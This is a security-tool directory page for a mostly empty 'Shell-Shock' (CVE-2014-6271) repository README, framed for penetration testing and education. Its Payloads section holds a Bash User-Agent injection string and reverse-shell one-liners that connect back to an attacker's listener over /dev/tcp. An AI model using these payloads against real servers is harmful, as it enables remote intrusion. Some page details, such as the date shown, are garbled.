Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Shell-Shock — *CVE-2014-6271* Unix Arbitrary Code Execution Exploit commonly know as Shell Shock. Examples, Docs, Incident Response and Vulnerability/Risk Assessment, and Additional Resources may be dumped here. Enjoy :) --- somhmxxghoul --- | Kitploit
Tools/GitHubGitHub/somhm-solutions/shell-shock
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingLearning & EducationIncident ResponseRemote Access ToolPayload Development
GitHubsomhm-solutions/shell-shock

Shell-Shock

*CVE-2014-6271* Unix Arbitrary Code Execution Exploit commonly know as Shell Shock. Examples, Docs, Incident Response and Vulnerability/Risk Assessment, and Additional Resources may be dumped here. Enjoy :) --- somhmxxghoul ---

136 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View Repository

Shell Shock

*Author(s): [email protected] *Maintainer(s): ** *Department: DevOps *License(s): **

Overview

Shell Shock: Privelege Escalation, Remote Code Execution Family of bugs in the Unix Bash Shell. Allow execution of arbitrary commands.

Exploitation Vectors


Payloads

  • shellshock user agent = User-Agent: () { :; } ; <$BASH_COMMAND>
  • rshell payload = bash -i >& /dev/tcp/127.0.0.1
    • rshell redirect to listener = bash -i >& /dev/tcp/$YOUR_IP:$PORT

Tricks

Design:

  • Purpose:
  • Contents:
  • Server(s):
    • Application:
    • Database:
  • Networking:
    • DNS:
    • Routes:
  • Application Dependencies:
  • Dependant Programs:

Basic Usage:

  • Usage:

  • Common Use Cases:

  • Examples:

Testing

Test Input

  • Parameters:
  • Actions:

Test Output

  • Output:
  • Screenshots:
  • Video:
  • Etc:

Notes:* [option]:

Download Tool